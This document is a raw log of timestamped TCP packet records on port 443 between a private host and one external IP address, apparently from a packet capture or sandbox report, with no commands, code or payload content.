Apr 26, 2024 21:35:24.588483095 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:24.588541985 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:24.590718031 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:24.590734005 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:24.590791941 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:24.590811014 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:25.573797941 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:25.573868036 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:25.573916912 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:25.573954105 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:25.967264891 CEST	49739	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:25.967318058 CEST	443	49739	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:25.995842934 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:25.995873928 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:25.995954990 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:25.996154070 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:25.996165037 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:26.530158043 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:26.530244112 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:26.530848026 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:26.530854940 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:26.532520056 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:26.532524109 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:26.532568932 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:26.532573938 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:26.993510008 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:26.993549109 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:26.993632078 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:26.993851900 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:26.993864059 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:27.535101891 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:27.535172939 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:27.536026955 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:27.536032915 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:27.537501097 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:27.537507057 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:27.581954956 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:27.582034111 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:27.582045078 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:27.582102060 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:27.582129002 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:27.582182884 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:27.583019018 CEST	49740	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:27.583033085 CEST	443	49740	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:28.109599113 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.109656096 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:28.109879017 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.110486984 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.110503912 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:28.612376928 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:28.612458944 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.612484932 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:28.612526894 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.612601995 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:28.612651110 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.613405943 CEST	49741	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.613419056 CEST	443	49741	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:28.648621082 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:28.648688078 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.649105072 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.649120092 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:28.650635004 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:28.650640965 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.161413908 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.161470890 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.161554098 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.161792994 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.161807060 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.686212063 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.686266899 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.686654091 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.686664104 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.688782930 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.688790083 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.756510019 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.756573915 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.756596088 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.756639004 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.756644964 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.756666899 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:29.756686926 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.756706953 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.757690907 CEST	49742	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:29.757704973 CEST	443	49742	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.520448923 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.520519972 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.520524979 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.520566940 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.520593882 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.520606995 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.520652056 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.520665884 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.520680904 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.521476030 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.639489889 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.639554024 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.639612913 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.639636040 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.639667034 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.639681101 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.817703009 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.817756891 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.817806959 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.817831039 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.817846060 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.817914009 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.927009106 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.927087069 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.927103043 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.927126884 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:30.927139997 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:30.927164078 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.020271063 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.020339966 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.020414114 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.020414114 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.020447969 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.020494938 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.088963985 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.089040041 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.089073896 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.089098930 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.089114904 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.089145899 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.134095907 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.134147882 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.134205103 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.134217978 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.134263039 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.191003084 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.191052914 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.191133976 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.191162109 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.191174984 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.191203117 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.241249084 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.241297007 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.241341114 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.241354942 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.241384983 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.241405010 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.284646034 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.284693956 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.284790993 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.284801960 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.284821033 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.284842968 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.326663971 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.326709032 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.326735020 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.326744080 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.326771975 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.326786995 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.361056089 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.361099958 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.361135960 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.361171007 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.361200094 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.361215115 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.389848948 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.389878035 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.390033007 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.390033007 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.390043974 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.390084028 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.415342093 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.415379047 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.415476084 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.415483952 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.415504932 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.415522099 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.437632084 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.437655926 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.437728882 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.437742949 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.437788963 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.462439060 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.462467909 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.462517977 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.462537050 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.462553978 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.462762117 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.483228922 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.483256102 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.483308077 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.483316898 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.483341932 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.483365059 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.506021976 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.506053925 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.506088972 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.506097078 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.506124020 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.506140947 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.525175095 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.525202036 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.525244951 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.525253057 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.525290966 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.525309086 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.545855999 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.545881987 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.545933962 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.545949936 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.545979977 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.546005011 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.563442945 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.563462019 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.563541889 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.563560963 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.563606024 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.579855919 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.579874039 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.579933882 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.579942942 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.579982996 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.598531961 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.598550081 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.598599911 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.598608971 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.598639011 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.598655939 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.615582943 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.615603924 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.615667105 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.615675926 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.615731955 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.630647898 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.630666018 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.630734921 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.630745888 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.630798101 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.647057056 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.647073030 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.647133112 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.647140980 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.647165060 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.647186041 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.660778999 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.660797119 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.660875082 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.660885096 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.660924911 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.675354004 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.675369978 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.675429106 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.675436974 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.675474882 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.687876940 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.687892914 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.687958002 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.687964916 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.688019991 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.702102900 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.702120066 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.702168941 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.702177048 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.702200890 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.702219963 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.713351011 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.713365078 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.713423014 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.713430882 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.713474989 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.725461960 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.725477934 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.725538969 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.725547075 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.725585938 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.738038063 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.738055944 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.738265038 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.738270998 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.738322020 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.748492956 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.748509884 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.748575926 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.748583078 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.748624086 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.758929014 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.758944988 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.759013891 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.759021044 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.759197950 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.769371033 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.769386053 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.769457102 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.769464016 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.769648075 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.780136108 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.780154943 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.780236959 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.780245066 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.780397892 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.780397892 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.789478064 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.789499998 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.789566040 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.789573908 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.789614916 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.799588919 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.799606085 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.799676895 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.799684048 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.799706936 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.799719095 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.810065031 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.810086012 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.810164928 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.810172081 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.810214996 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.817420006 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.817442894 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.817507029 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.817521095 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.817565918 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.824142933 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.824188948 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.824222088 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.824223995 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.824251890 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.824286938 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.824781895 CEST	49744	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.824801922 CEST	443	49744	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.862812996 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.862854004 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:31.862921000 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.863243103 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:31.863255978 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:32.398906946 CEST	443	49749	95.217.246.168	192.168.2.4
Apr 26, 2024 21:35:32.401660919 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:32.402079105 CEST	49749	443	192.168.2.4	95.217.246.168
Apr 26, 2024 21:35:32.402086020 CEST	443	49749	95.217.246.168	192.168.2.4
